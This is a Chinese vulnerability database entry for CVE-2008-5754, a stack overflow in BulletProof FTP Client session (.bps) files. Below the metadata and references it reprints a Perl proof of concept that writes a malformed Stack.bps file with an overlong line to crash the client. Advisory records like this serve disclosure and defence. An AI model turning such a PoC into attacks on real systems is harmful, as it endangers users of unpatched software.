BulletProof FTP Client '.bps' File Stack 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117146 漏洞类型 缓冲区溢出
发布时间 2008-12-28 更新时间 2009-06-08
CVE编号 CVE-2008-5754 CNNVD-ID CNNVD-200812-477
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7589
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-477
|漏洞详情
BulletProofFTP是新一代的FTP的客户端软件。BulletProofFTP客户端中存在栈缓冲区溢出。用户协助式的攻击者可以借助具有长的二线的一个.bps文件(又称Session-File),执行任意代码。该漏洞可能与CVE-2008-5753相关。
|漏洞EXP
#!/usr/bin/perl
########################################
#[*] Bug : BulletProof FTP Client .bps Local Stack Overflow (PoC)
#[*] Founded by : Mountassif Moad
#[*] Greetz : All Freind Str0ke
#[*] HOw to use => go to file after Load BP session & Enter and boom :d overflowing :d
########################################
use warnings;
use strict;
my $chars   = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n" .
                        "\x41" x 100 .
      "\n21\n".
      "Stack\n".
      "bpfhljamedaldlffpojmqhpo\n".
                        "c:\/\n" .
                        "/\n";
my $file="Stack.bps";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Stack";

# milw0rm.com [2008-12-28]
|参考资料

来源:BID
名称:33024
链接:http://www.securityfocus.com/bid/33024
来源:MILW0RM
名称:8420
链接:http://www.milw0rm.com/exploits/8420
来源:MILW0RM
名称:7589
链接:http://www.milw0rm.com/exploits/7589